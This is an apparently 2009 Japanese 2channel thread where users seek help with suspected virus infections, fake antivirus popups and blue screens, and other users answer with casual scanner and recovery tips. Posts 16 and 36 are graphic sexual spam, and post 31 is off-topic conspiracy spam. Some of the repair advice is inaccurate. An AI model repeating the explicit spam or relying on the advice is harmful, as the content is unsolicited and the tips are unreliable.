15 :名無しさん@お腹いっぱい。:2009/06/11(木) 04:48:28
VirusTotalってちょっと前は20MB以上もスキャンできたけど
今って20MB以上無理じゃないですか?
これって20MB以上行けたのは一時期大容量ファイル対応テストでもしてたんですか?
それとも20MB以上スキャンは月の対応数が決まってて俺のPCが対応数越えちゃったんですかね?
今って20MB以上無理じゃないですか?
これって20MB以上行けたのは一時期大容量ファイル対応テストでもしてたんですか?
それとも20MB以上スキャンは月の対応数が決まってて俺のPCが対応数越えちゃったんですかね?
16 :名無しさん@お腹いっぱい。:2009/06/11(木) 13:23:06
,,,:;;:::::::::::::::::::::::,,,
:::::::::::::::,,,,,、、、::::::::::;;、
;;:::;;"" """;;::::;;
;::; ;;:::::;;
ー〜" ̄ ̄"-─-っ____ ;:;γ;
ヽ- ゝニニニつ ヾ;/. .|
""" ̄ヾ、 ゝニニニフ` |)丿
ーヽ、_ 〃⌒) .) |ソ
|`""~~. ^,,^ ヽ .|
. | ,-三-、 イ
ノヽ "" / ゝ
`ヾ、____,,,,,, イ ヽ
生竿でズボズボ掘り込まれるといい鳴きする超淫乱なウケ野郎っす。
職業はプロレスラー、短髪、ガッチリタイプ。
後楽園ホールのバックステージで羞恥心捨てて種汁便所になるぜ。
ケツマンに濃厚オイルたっぷり仕込んでケツ開いてノリのいいタチを待
つんで、俺の具合のいいケツマンを存分に掘り込んで、溜まった種汁を
奥へ思いっきりぶっ放してくれ。
デカマラ、バリタチ歓迎!ギンギンのマラをズッポリと咥え込むぜ。
何人にも廻されて種汁便所になりてぇ〜!
活きのいいタチ野郎、俺のケツを種汁で満タンにしてあふれさせてくれ。
頼んだぜ!
:::::::::::::::,,,,,、、、::::::::::;;、
;;:::;;"" """;;::::;;
;::; ;;:::::;;
ー〜" ̄ ̄"-─-っ____ ;:;γ;
ヽ- ゝニニニつ ヾ;/. .|
""" ̄ヾ、 ゝニニニフ` |)丿
ーヽ、_ 〃⌒) .) |ソ
|`""~~. ^,,^ ヽ .|
. | ,-三-、 イ
ノヽ "" / ゝ
`ヾ、____,,,,,, イ ヽ
生竿でズボズボ掘り込まれるといい鳴きする超淫乱なウケ野郎っす。
職業はプロレスラー、短髪、ガッチリタイプ。
後楽園ホールのバックステージで羞恥心捨てて種汁便所になるぜ。
ケツマンに濃厚オイルたっぷり仕込んでケツ開いてノリのいいタチを待
つんで、俺の具合のいいケツマンを存分に掘り込んで、溜まった種汁を
奥へ思いっきりぶっ放してくれ。
デカマラ、バリタチ歓迎!ギンギンのマラをズッポリと咥え込むぜ。
何人にも廻されて種汁便所になりてぇ〜!
活きのいいタチ野郎、俺のケツを種汁で満タンにしてあふれさせてくれ。
頼んだぜ!
17 :名無しさん@お腹いっぱい。:2009/06/11(木) 14:59:51
質問させてください
先ほどヴァイラストタルでexeファイルのチェックをしたのですが、
結果2/39 (5.13%)で、
eSafe 7.0.17.0 2009.06.10 Win32.worm
Prevx 3.0 2009.06.11 High Risk Worm
二つのベンダーで反応がありました。
これはウイルスということなんでしょうか?
wormと出ているのでまったく安全ということは無さそうな気もしますが…。
インストール済みのbitとAVGでは無反応でした。
あいまいな感じなので、安全なのか、駄目なのか、断定するほうほうがありましたら教えて下さい
先ほどヴァイラストタルでexeファイルのチェックをしたのですが、
結果2/39 (5.13%)で、
eSafe 7.0.17.0 2009.06.10 Win32.worm
Prevx 3.0 2009.06.11 High Risk Worm
二つのベンダーで反応がありました。
これはウイルスということなんでしょうか?
wormと出ているのでまったく安全ということは無さそうな気もしますが…。
インストール済みのbitとAVGでは無反応でした。
あいまいな感じなので、安全なのか、駄目なのか、断定するほうほうがありましたら教えて下さい
18 :名無しさん@お腹いっぱい。:2009/06/11(木) 18:05:43
最近ネット使っててIE起動すると「VirusRemover2009」のページに誘導される事が
頻繁にあるんだけど、これって俺だけなんだろうか?
過去の例を見てみると「VirusRemover2008」は偽アンチウイルスソフトだったから
今回のも同類だと思うけど、流行し始めたのが最近なのか、ググっても殆どヒットしないんだよね。
結局、対策らしい対策も見つからず…
リカバリ以外で対策方法知ってる人っている?
頻繁にあるんだけど、これって俺だけなんだろうか?
過去の例を見てみると「VirusRemover2008」は偽アンチウイルスソフトだったから
今回のも同類だと思うけど、流行し始めたのが最近なのか、ググっても殆どヒットしないんだよね。
結局、対策らしい対策も見つからず…
リカバリ以外で対策方法知ってる人っている?
19 :名無しさん@お腹いっぱい。:2009/06/11(木) 18:11:14
20 :名無しさん@お腹いっぱい。:2009/06/11(木) 20:21:46
>>19
うーん、とりあえずSP3にしたらどうかな?
うーん、とりあえずSP3にしたらどうかな?
21 :名無しさん@お腹いっぱい。:2009/06/12(金) 07:09:57
22 :名無しさん@お腹いっぱい。:2009/06/12(金) 12:44:47
18+19 です
>>20
ありがとう。
う〜ん、アップデートしたいのも山々なんだけど、SP3って確か
サイズが3GB前後でしたよね・・・。それがネックで、見送ってたんだよね。
現在空が6GBだけど、残り3GB以下になってくると色々と問題が出てきそうで。
>>21
ありがとう、今ググってみました。こんなソフトがあったんですね。
Free版とPro版の2つあるみたいなので、とりあえず前者ので試してみます。
・・・しかし、どこで「VirusRemover2009」みたいなウイルスに感染したのか、
何度考えてもナゾです。 変なサイトとか見てた訳じゃないんですけどね(^ ^;)
>>20
ありがとう。
う〜ん、アップデートしたいのも山々なんだけど、SP3って確か
サイズが3GB前後でしたよね・・・。それがネックで、見送ってたんだよね。
現在空が6GBだけど、残り3GB以下になってくると色々と問題が出てきそうで。
>>21
ありがとう、今ググってみました。こんなソフトがあったんですね。
Free版とPro版の2つあるみたいなので、とりあえず前者ので試してみます。
・・・しかし、どこで「VirusRemover2009」みたいなウイルスに感染したのか、
何度考えてもナゾです。 変なサイトとか見てた訳じゃないんですけどね(^ ^;)
23 :名無しさん@お腹いっぱい。:2009/06/12(金) 14:09:25
>Windows XP SP1
答えは出てるじゃないか。
答えは出てるじゃないか。
24 :名無しさん@お腹いっぱい。:2009/06/12(金) 16:06:15
h p://karapaia.livedoor.biz/archives/51438512.html
カラパイアっていうブログなんですがファイヤーフォックスだと画像がでないので
I・Eで訪問したらAVGに怒られたのですが、語検出かな?
カラパイアっていうブログなんですがファイヤーフォックスだと画像がでないので
I・Eで訪問したらAVGに怒られたのですが、語検出かな?
25 :名無しさん@お腹いっぱい。:2009/06/13(土) 00:24:02
質問ので上げさせていただきます。
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「恐らく最新」
【ルータの有無】 「有」
あまり怪しいところには行かないのでセキリティはファイアウォールとルータのみです。
パケット送受信量が異常に増えており、数時間ごとにルータが回線を遮断してしまいます。
ウィルスのせいかと思ったので、ニフティとカスペの完全スキャンをかけたのですがなにも検出されず。
今後、片っぱしからスキャンを掛けまくるべきでしょうか?それとも原因が想定とは違うのでしょうか?
どうかご意見お聞かせください。
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「恐らく最新」
【ルータの有無】 「有」
あまり怪しいところには行かないのでセキリティはファイアウォールとルータのみです。
パケット送受信量が異常に増えており、数時間ごとにルータが回線を遮断してしまいます。
ウィルスのせいかと思ったので、ニフティとカスペの完全スキャンをかけたのですがなにも検出されず。
今後、片っぱしからスキャンを掛けまくるべきでしょうか?それとも原因が想定とは違うのでしょうか?
どうかご意見お聞かせください。
26 :名無しさん@お腹いっぱい。:2009/06/13(土) 01:05:53
昨日からPC立ち上げるとデスクトップに行く前に青い画面になって正常にシャットダウンされませんでした、となって、そのたびにセーフモードで復元ポイントをしてなおしてるのですが、次回開くとまた青い画面が出てしまいます・・・
どうしたらいいのでしょうか?
どうしたらいいのでしょうか?
27 :名無しさん@お腹いっぱい。:2009/06/13(土) 06:27:08
質問させて下さい。
Windows XP使ってます。
TV等の無料動画サイトパンドラ(韓国)のHPに行ったところ、
サイトにウィルスが見つかったという表示がでました。
使用セキュリティーソフトはNORTON360です。
すぐに閉じたのですが、いつもホームに使用している
BIGLOBEのURLが表示されているところのマークがなぜか
パンドラTVのアイコンになってることに気付きました。
とりあえず、システム復元したら、どの日付で実行しても
失敗します。相変わらず、BIGLOBEのマークにはPのアイコンが。
これって感染したってことでしょうか?
過去に、見逃したドラマを見るために何度か行ってますが、
こんなことは初めてです。よろしくお願いします。
Windows XP使ってます。
TV等の無料動画サイトパンドラ(韓国)のHPに行ったところ、
サイトにウィルスが見つかったという表示がでました。
使用セキュリティーソフトはNORTON360です。
すぐに閉じたのですが、いつもホームに使用している
BIGLOBEのURLが表示されているところのマークがなぜか
パンドラTVのアイコンになってることに気付きました。
とりあえず、システム復元したら、どの日付で実行しても
失敗します。相変わらず、BIGLOBEのマークにはPのアイコンが。
これって感染したってことでしょうか?
過去に、見逃したドラマを見るために何度か行ってますが、
こんなことは初めてです。よろしくお願いします。
28 :名無しさん@お腹いっぱい。:2009/06/13(土) 16:06:18
【使用OS】 WIn2000SP4
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】Avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Avast
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
c:\winnt\lsass.exe
ググってもウィルスかどうか分からんです・・・
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】Avast 4.8
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 Avast
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
c:\winnt\lsass.exe
ググってもウィルスかどうか分からんです・・・
29 :名無しさん@お腹いっぱい。:2009/06/13(土) 16:18:15
30 :名無しさん@お腹いっぱい。:2009/06/13(土) 16:31:25
>>29
system32以下にない(WINNTディレクトリ直下)場合はウィルス?
system32以下にない(WINNTディレクトリ直下)場合はウィルス?
31 :名無しさん@お腹いっぱい。:2009/06/13(土) 19:52:21
「再び、盗聴教団の解明」
山崎正友 氏 日新報道より
昭和40年代から・・・
会員については詳細な名簿を作り
コンピュータで管理、家庭の内情、
家族の状況、経済状態まで掌握
票を入れるシンパも。さらに敵対者は
24時間監視、あらゆる嫌がらせ・・・
ttp://www.yamasaki-masatomo.com/books.htm
ttp://page.freett.com/sokagakkai_komei/katsudou/soka_tochoo.html
32 :名無しさん@お腹いっぱい。:2009/06/14(日) 10:31:10
>>30
うん。
2000やXPでも同じだけど、元々systemやsystem32ディレクトリにあったファイルが
WindowsやWinnt直下にある場合は、ウイルス濃厚
system32フォルダにもlsassあるでしょ?
うん。
2000やXPでも同じだけど、元々systemやsystem32ディレクトリにあったファイルが
WindowsやWinnt直下にある場合は、ウイルス濃厚
system32フォルダにもlsassあるでしょ?
33 :名無しさん@お腹いっぱい。:2009/06/14(日) 19:42:13
>>26
微妙にスレ違な質問だとは思いますが、一応緊急用として下記に
対策書いておきます(^ ^;) ただし、Windows XP での手順なので、
それ以外のOSでは少々異なるかもしれないです。
コントロールパネル (もしくはデスクトップ) から「システム」を開く→
「詳細設定」タブを開く→「起動と回復」の項目から「設定」をクリック→
「システムエラー」の項目にある「自動的に再起動する」のチェックを外す→
「OK」をクリック→「OK」をクリック→PCを再起動
これで再起動後に青い画面にならければ成功。
ただし、青い画面になる原因は、PCを正常にシャットダウン出来なかった場合や
それ以外にもHDDが汚れていたり破損している、もしくはシステムに
異常がある場合にも起こるので、これでは完全に解決した訳ではないです。
まぁ、青い画面に入るとチェックに長い時間が掛かるので、とりあえずそれだけは
回避できるという程度ですね。
ちなみに、復元ポイントは使い過ぎない方が良いですよ。
完全に復元出来ないし、かえってややこしい状態になる可能性もあります。
しかも、これらの原因が万が一ウイルスによるものなら、復元と同時に
ウイルスまで復活させてしまう事も考えられるので、要注意です。
以上、経験談でしたm( _ _ )m
微妙にスレ違な質問だとは思いますが、一応緊急用として下記に
対策書いておきます(^ ^;) ただし、Windows XP での手順なので、
それ以外のOSでは少々異なるかもしれないです。
コントロールパネル (もしくはデスクトップ) から「システム」を開く→
「詳細設定」タブを開く→「起動と回復」の項目から「設定」をクリック→
「システムエラー」の項目にある「自動的に再起動する」のチェックを外す→
「OK」をクリック→「OK」をクリック→PCを再起動
これで再起動後に青い画面にならければ成功。
ただし、青い画面になる原因は、PCを正常にシャットダウン出来なかった場合や
それ以外にもHDDが汚れていたり破損している、もしくはシステムに
異常がある場合にも起こるので、これでは完全に解決した訳ではないです。
まぁ、青い画面に入るとチェックに長い時間が掛かるので、とりあえずそれだけは
回避できるという程度ですね。
ちなみに、復元ポイントは使い過ぎない方が良いですよ。
完全に復元出来ないし、かえってややこしい状態になる可能性もあります。
しかも、これらの原因が万が一ウイルスによるものなら、復元と同時に
ウイルスまで復活させてしまう事も考えられるので、要注意です。
以上、経験談でしたm( _ _ )m
34 :名無しさん@お腹いっぱい。:2009/06/14(日) 20:02:07
>>26
失礼。 >>33 ↑で違う方法を書いてしまいましたm( _ _ )m
所謂、「チェックディスク」が起動している状態だと思うので、
以下が正しい方法です。
※この操作は必ずAdministrator権限を持つユーザーでログオンしてから行って下さい。
1:「スタート」 ボタンをクリックし、「ファイル名を指定して実行」 をクリック
2:「名前」 欄に 「cmd」 と入力し 「OK」 ボタンをクリック
3:「コマンド プロンプト」 が表示されますので、 以下のコマンドを入力し
「Enter」 キーを押す
chkntfs /x c:
(Dドライブへのチェックを停止したい場合は chkntfs /x c d: と入力)
PCを再起動
これで起動時に指定したドライブのチェックを行わないようになる。
元の設定に戻すには、上記のコマンドのあとに /D オプションを追加して
再度chkntfsを実行すればOK。
ただし、これらはシステムを変更してしまうやり方なので、自己責任で
行って下さいませm( _ _ )m
失礼。 >>33 ↑で違う方法を書いてしまいましたm( _ _ )m
所謂、「チェックディスク」が起動している状態だと思うので、
以下が正しい方法です。
※この操作は必ずAdministrator権限を持つユーザーでログオンしてから行って下さい。
1:「スタート」 ボタンをクリックし、「ファイル名を指定して実行」 をクリック
2:「名前」 欄に 「cmd」 と入力し 「OK」 ボタンをクリック
3:「コマンド プロンプト」 が表示されますので、 以下のコマンドを入力し
「Enter」 キーを押す
chkntfs /x c:
(Dドライブへのチェックを停止したい場合は chkntfs /x c d: と入力)
PCを再起動
これで起動時に指定したドライブのチェックを行わないようになる。
元の設定に戻すには、上記のコマンドのあとに /D オプションを追加して
再度chkntfsを実行すればOK。
ただし、これらはシステムを変更してしまうやり方なので、自己責任で
行って下さいませm( _ _ )m
35 :名無しさん@お腹いっぱい。:2009/06/14(日) 20:10:05
>>33 の補足
>>33 の方法は、システムエラーが起きた場合にPCが勝手に落ちる現象を
回避する方法です。
・・・ま、何れにしても回避は回避なので、根本的な解決にはなってないっす。
これらの原因がウイルスやスパイウェアなどによるものという事も大いに考えられるので、
アンチウイルスソフトやオンラインスキャンでチェックしてみてから行った方が良いかもしれない。
>>33 の方法は、システムエラーが起きた場合にPCが勝手に落ちる現象を
回避する方法です。
・・・ま、何れにしても回避は回避なので、根本的な解決にはなってないっす。
これらの原因がウイルスやスパイウェアなどによるものという事も大いに考えられるので、
アンチウイルスソフトやオンラインスキャンでチェックしてみてから行った方が良いかもしれない。
36 :名無しさん@お腹いっぱい。:2009/06/14(日) 22:30:48
俺は168*58*40 P16*4.5 太マラ デカ玉 パイパンのド変態M。
お互いにラバー全頭マスク、ハーネス、多重リング装着でM同士で狂いたい。
大きな鏡前に、お互いにM字開脚で縛り、玉同士を鎖で引っ張り合いながらの同士脱糞。
盛り上がったトロマン同士を密着させ内壁を絡ませるトロマン同士のディープキス。
強烈うなぎバイブ(40*400mmのWローター付)をトロマンが密着するまで挿入し、
ペニス同士を一本にギチギチに縛り、亀頭にローターバイブ固定、
更に太い蝋燭を固定し狂乱になったり。
その他、同時浣腸でのうなぎ連結、同時小便吹き上げ、同時玉ダンベル、同時乳首責めなどなど…。
赤いスポットライトや蝋燭の灯りの下で、M同士のド変態プレイで一緒に墜ちたい。
太マラ、パイパン、デカ乳首の長時間プレイに耐えられるド変態Mからの連絡を待っている。
一緒に鳴き狂いまくろうぜ!
都下在住
[身長/体重/年齢]
168*58*40
お互いにラバー全頭マスク、ハーネス、多重リング装着でM同士で狂いたい。
大きな鏡前に、お互いにM字開脚で縛り、玉同士を鎖で引っ張り合いながらの同士脱糞。
盛り上がったトロマン同士を密着させ内壁を絡ませるトロマン同士のディープキス。
強烈うなぎバイブ(40*400mmのWローター付)をトロマンが密着するまで挿入し、
ペニス同士を一本にギチギチに縛り、亀頭にローターバイブ固定、
更に太い蝋燭を固定し狂乱になったり。
その他、同時浣腸でのうなぎ連結、同時小便吹き上げ、同時玉ダンベル、同時乳首責めなどなど…。
赤いスポットライトや蝋燭の灯りの下で、M同士のド変態プレイで一緒に墜ちたい。
太マラ、パイパン、デカ乳首の長時間プレイに耐えられるド変態Mからの連絡を待っている。
一緒に鳴き狂いまくろうぜ!
都下在住
[身長/体重/年齢]
168*58*40
37 :名無しさん@お腹いっぱい。:2009/06/14(日) 22:57:52
さっきVeohから落としたflv動画を再生していたら、
アウトルックが勝手に起動して再生していた動画が添付されたメールが作られていました。
avastは何も反応しませんでしたがウイルスでしょうか?
アウトルックが勝手に起動して再生していた動画が添付されたメールが作られていました。
avastは何も反応しませんでしたがウイルスでしょうか?
38 :名無しさん@お腹いっぱい。:2009/06/20(土) 21:00:01
ttp://www1.axfc.net/uploader/Img/so/49591
何か踏んでしまったらしく上のようなポップアップがたまに出てきて、
perfect defenderというフェイクのセキュリティソフトを入れようとしてきます。
ウイルス検索でwin32〜というのは駆除したんですがそれ以降も出てくるんで困ってるんですが
消す方法はないでしょうか?
何か踏んでしまったらしく上のようなポップアップがたまに出てきて、
perfect defenderというフェイクのセキュリティソフトを入れようとしてきます。
ウイルス検索でwin32〜というのは駆除したんですがそれ以降も出てくるんで困ってるんですが
消す方法はないでしょうか?
39 :名無しさん@お腹いっぱい。:2009/06/20(土) 21:36:21
テンプレ埋めろよ・・・
とりあえずSUPERAniSpywareでも試してみては?
とりあえずSUPERAniSpywareでも試してみては?
40 :名無しさん@お腹いっぱい。:2009/06/20(土) 21:40:07
SUPERAntiSpywareだった・・・
41 :名無しさん@お腹いっぱい。:2009/06/20(土) 22:37:52
>>39
そのソフト導入したらなんとか正常に戻りました、ありがとうございます。
しかしそれ以前にも何個かセキュリティソフト使ってみたけど対処できるソフトと
できないソフトの差がけっこうあるもんなんですね。
そのソフト導入したらなんとか正常に戻りました、ありがとうございます。
しかしそれ以前にも何個かセキュリティソフト使ってみたけど対処できるソフトと
できないソフトの差がけっこうあるもんなんですね。
42 :名無しさん@お腹いっぱい。:2009/06/21(日) 20:18:23
使用OS】 WIn2000SP4
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】ウィルスバスター2006?
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ウィルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
症状としては、ネットに繋ぐたびにブラクラ状態になってしまい
どうにもならないようです。中国人のエロ画像とかを大量に落としてくるようです。
スキャンしてもスパイウェアが引っ掛かるのですが、
ウィルスそのものは検出しないそうです。
知人のPCで、電話で相談を受けていますが、
自分ではよく分からなくて・・・
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】ウィルスバスター2006?
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 ウィルスバスター2006
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
症状としては、ネットに繋ぐたびにブラクラ状態になってしまい
どうにもならないようです。中国人のエロ画像とかを大量に落としてくるようです。
スキャンしてもスパイウェアが引っ掛かるのですが、
ウィルスそのものは検出しないそうです。
知人のPCで、電話で相談を受けていますが、
自分ではよく分からなくて・・・
43 :名無しさん@お腹いっぱい。:2009/06/22(月) 20:55:18
【使用OS】 win xp sp3」
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
先日ウィルスバスターでウィルス検索をかけたら、 TROJ_GEN.020413Sというウィルスが検地されました。(アンダーバーの箇所はドットかもしれません。下線が引かれており見分けられませんでした)
TrendMicroのウィルス情報でウィルス内容を検索しても見当たらず、ぐぐってみても見つけることができませんでした。
このウィルスはどのような危害を及ぼすのでしょうか。
TROJとなっているのでトロイの木馬ではないかと心配しています。(しかし、バスターの振り分けではトロイの木馬ではなく通常のウィルスとされていました)
また、ウィルスを駆除しようにも"最新のverにアップデートするか、対応されるまでお待ち下さい"と出てできませんでした。
現在は隔離しているのですが、このままの対処法で大丈夫でしょうか。
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
先日ウィルスバスターでウィルス検索をかけたら、 TROJ_GEN.020413Sというウィルスが検地されました。(アンダーバーの箇所はドットかもしれません。下線が引かれており見分けられませんでした)
TrendMicroのウィルス情報でウィルス内容を検索しても見当たらず、ぐぐってみても見つけることができませんでした。
このウィルスはどのような危害を及ぼすのでしょうか。
TROJとなっているのでトロイの木馬ではないかと心配しています。(しかし、バスターの振り分けではトロイの木馬ではなく通常のウィルスとされていました)
また、ウィルスを駆除しようにも"最新のverにアップデートするか、対応されるまでお待ち下さい"と出てできませんでした。
現在は隔離しているのですが、このままの対処法で大丈夫でしょうか。
44 :名無しさん@お腹いっぱい。:2009/06/24(水) 00:31:51
45 :名無しさん@お腹いっぱい。:2009/06/25(木) 00:37:15
【使用OS】 「XP home」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「毎日更新」
【スパイウェア対策ソフト】 「Spybot常駐、時々Ad-Awareで検索」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
ttp://dnf.wikiwiki.jp/
アラド戦記というネトゲのwikiなんですが、TOPページでavast、ノートン2009が
Trojan.Dropperが仕掛けられていると検出すると、ゲームの本スレで話題が出たのですが
自分の使ってるカスペルスキー2009では無反応で、ノートンのオンラインスキャン
パスターのオンラインスキャン共に何も検出されません。
Ad-Aware、Spybotでも何も引っかかりませんでした。
本当にウイルスが仕掛けられてるのか、コードを貼って誤検出させてるのかが
分からないのですが、どう判断したらいいんでしょうか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「カスペルスキー2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「毎日更新」
【スパイウェア対策ソフト】 「Spybot常駐、時々Ad-Awareで検索」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「無し」
ttp://dnf.wikiwiki.jp/
アラド戦記というネトゲのwikiなんですが、TOPページでavast、ノートン2009が
Trojan.Dropperが仕掛けられていると検出すると、ゲームの本スレで話題が出たのですが
自分の使ってるカスペルスキー2009では無反応で、ノートンのオンラインスキャン
パスターのオンラインスキャン共に何も検出されません。
Ad-Aware、Spybotでも何も引っかかりませんでした。
本当にウイルスが仕掛けられてるのか、コードを貼って誤検出させてるのかが
分からないのですが、どう判断したらいいんでしょうか?
46 :名無しさん@お腹いっぱい。:2009/06/26(金) 19:51:49
【使用OS】 「WindowsXP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「VB2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
exeを解凍したら同じ画像がデスクトップに連続でコピーされ続け
その画像が何度も表示され操作できなくなりました。
Windowsビューアが表示されて消え表示されては消えの連続が高速でです。
セーフモードで起動してそのexeと画像は削除し復元もしてみたのですが治りません。
何というウィルス名か教えてください。宜しくお願いします。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「VB2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
exeを解凍したら同じ画像がデスクトップに連続でコピーされ続け
その画像が何度も表示され操作できなくなりました。
Windowsビューアが表示されて消え表示されては消えの連続が高速でです。
セーフモードで起動してそのexeと画像は削除し復元もしてみたのですが治りません。
何というウィルス名か教えてください。宜しくお願いします。
47 :名無しさん@お腹いっぱい。:2009/06/28(日) 23:38:29
48 :名無しさん@お腹いっぱい。:2009/06/29(月) 18:16:39
49 :名無しさん@お腹いっぱい。:2009/06/29(月) 18:21:26
50 :名無しさん@お腹いっぱい。:2009/06/29(月) 19:53:58
>>42
とりあえずリカバリが一番手っ取り早いです。
中国製は駆除が面倒なので。
>>43
TROJ_GENなのでおそらく「Gneric」検出。
グレー状態、検体として提出すれば後日対応委されるかと
とりあえず、隔離されているなら、他には影響しないと思います。
>>45
http://oshiete1.goo.ne.jp/qa1978978.html
システムクリーナーが有効らしい。
ttp://esupport.trendmicro.co.jp/Pages/JP-24700.aspx
>>46
ウイルスというかスパイウエアっぽいが。
今の状態でNETに繋ぐのも危険なので、リカバリしては?
とりあえずリカバリが一番手っ取り早いです。
中国製は駆除が面倒なので。
>>43
TROJ_GENなのでおそらく「Gneric」検出。
グレー状態、検体として提出すれば後日対応委されるかと
とりあえず、隔離されているなら、他には影響しないと思います。
>>45
http://oshiete1.goo.ne.jp/qa1978978.html
システムクリーナーが有効らしい。
ttp://esupport.trendmicro.co.jp/Pages/JP-24700.aspx
>>46
ウイルスというかスパイウエアっぽいが。
今の状態でNETに繋ぐのも危険なので、リカバリしては?
51 :名無しさん@お腹いっぱい。:2009/06/29(月) 22:51:08
>>49
お前は何がしたいんだ?
お前は何がしたいんだ?
52 :名無しさん@お腹いっぱい。:2009/06/29(月) 23:06:56
53 :名無しさん@お腹いっぱい。:2009/07/01(水) 11:37:38
【使用OS】 「Windows7」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
スタンバイの復帰に失敗して強制再起動すると下記画面が表示されます。
http://uproda.2ch-library.com/143906jiY/lib143906.jpg
某スレで質問したらウィルスらしいとのことでこちらで質問させていただきました。
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「有」
スタンバイの復帰に失敗して強制再起動すると下記画面が表示されます。
http://uproda.2ch-library.com/143906jiY/lib143906.jpg
某スレで質問したらウィルスらしいとのことでこちらで質問させていただきました。
>>53
うろ覚えですが結構厄介なマルウェアだったと記憶しています。
SUPERAntiSpywareで撃退出来たと思うのでインストールして試してみてください。
ただし、通常の正常なファイルの名前を変更したり等を行っている可能性が高いので。
駆除に成功してもリカバリーされる事をお勧めします。
うろ覚えですが結構厄介なマルウェアだったと記憶しています。
SUPERAntiSpywareで撃退出来たと思うのでインストールして試してみてください。
ただし、通常の正常なファイルの名前を変更したり等を行っている可能性が高いので。
駆除に成功してもリカバリーされる事をお勧めします。
55 : ◆N9P3SuvBPo :2009/07/01(水) 18:09:26
>53
これは致命的なバグだな。
これは致命的なバグだな。
56 :名無しさん@お腹いっぱい。:2009/07/01(水) 22:12:10
良くわからないんだけど
何故に初心者スレにWin7RCユーザーが来るのだろう……?
別にいいけど
何故に初心者スレにWin7RCユーザーが来るのだろう……?
別にいいけど
57 :名無しさん@お腹いっぱい。:2009/07/01(水) 23:02:50
あ、ここ違ったのね。
初心者スレと間違った。
初心者スレと間違った。
58 :名無しさん@お腹いっぱい。:2009/07/02(木) 16:03:35
【使用OS】 「XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキュリティZERO」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「無し」
sens.dllがトロイの木馬っぽいのに
感染したのですが
今の所なにも困ってません
あんまり重要なものじゃなさそうなのでそのままsens.dllを削除しちゃっていいですか?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスセキュリティZERO」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【ルータの有無】 「無し」
sens.dllがトロイの木馬っぽいのに
感染したのですが
今の所なにも困ってません
あんまり重要なものじゃなさそうなのでそのままsens.dllを削除しちゃっていいですか?
>>54
SUPERAntiSpywareでスキャンしたとろこCookieが100個ぐらい検出されて削除したのですが
クッキー程度で起動時に変なアイコン表示されたりするのでしょうか?
マルウェアの具体的な詳細知りたいのですが検索のヒントになるようなキーワード覚えてないでしょうか?
SUPERAntiSpywareでスキャンしたとろこCookieが100個ぐらい検出されて削除したのですが
クッキー程度で起動時に変なアイコン表示されたりするのでしょうか?
